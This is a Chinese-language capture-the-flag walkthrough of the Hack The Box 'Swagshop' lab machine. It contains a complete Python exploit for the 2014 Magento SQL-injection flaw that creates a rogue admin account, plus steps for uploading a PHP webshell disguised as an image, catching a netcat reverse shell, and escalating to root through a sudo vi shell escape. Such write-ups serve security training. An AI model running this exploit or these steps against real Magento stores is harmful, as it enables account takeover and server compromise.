Swagshop

Posted by on 2020年2月23日


Swagshop

nmap扫描端口

ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.140 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV 10.10.10.140

file

访问80端口为2014 Magento

file

Google:magento 2014 exploit

file

import requests
import base64
import sys

target = "http://10.10.10.140/index.php"

if not target.startswith("http"):
    target = "http://" + target

if target.endswith("/"):
    target = target[:-1]

target_url = target + "/admin/Cms_Wysiwyg/directive/index/"

q="""
SET @SALT = 'rp';
SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{password}') ), CONCAT(':', @SALT ));
SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;
INSERT INTO admin_user (firstname, lastname,email,username,password,created,lognum,reload_acl_flag,is_active,extra,rp_token,rp_token_created_at) VALUES ('Firstname','Lastname','email@example.com','{username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());
INSERT INTO admin_role (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{username}'),'Firstname');
"""

query = q.replace("\n", "").format(username="forme", password="forme")
pfilter = "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);{0}".format(query)

# e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ decoded is{{block type=Adminhtml/report_search_grid output=getCsvFile}}
r = requests.post(target_url, 
                  data={"___directive": "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ",
                        "filter": base64.b64encode(pfilter),
                        "forwarded": 1})
if r.ok:
    print "WORKED"
    print "Check {0}/admin with creds forme:forme".format(target)
else:
    print "DID NOT WORK"

执行脚本

file

使用forme:forme登陆

file

系统->配置

file

高级->开发人员

file

模板设置–>允许符号链接->保存配置

file

gedit shell.php.png

file

目录–>管理类别:

file
file
file

文件上传至:http://10.10.10.140/media/catalog/category/shell.php.png

file

新闻稿–>新闻稿模板:

file

输入:

{{block type='core/template' template='../../../../../../media/catalog/category/shell.php.png'}}

file

kali监听:

nc -vlp 1337

保存并预览

file

get www shell

file

python3 获取tty shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

file

ctrl+z
stty raw -echo

file

get user.txt

file

sudo -l

file

sudo /usr/bin/vi /var/www/html/index.php
:!/bin/bash

file

get root shell

file

get root.txt

file




发表评论

电子邮件地址不会被公开。 必填项已用*标注

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据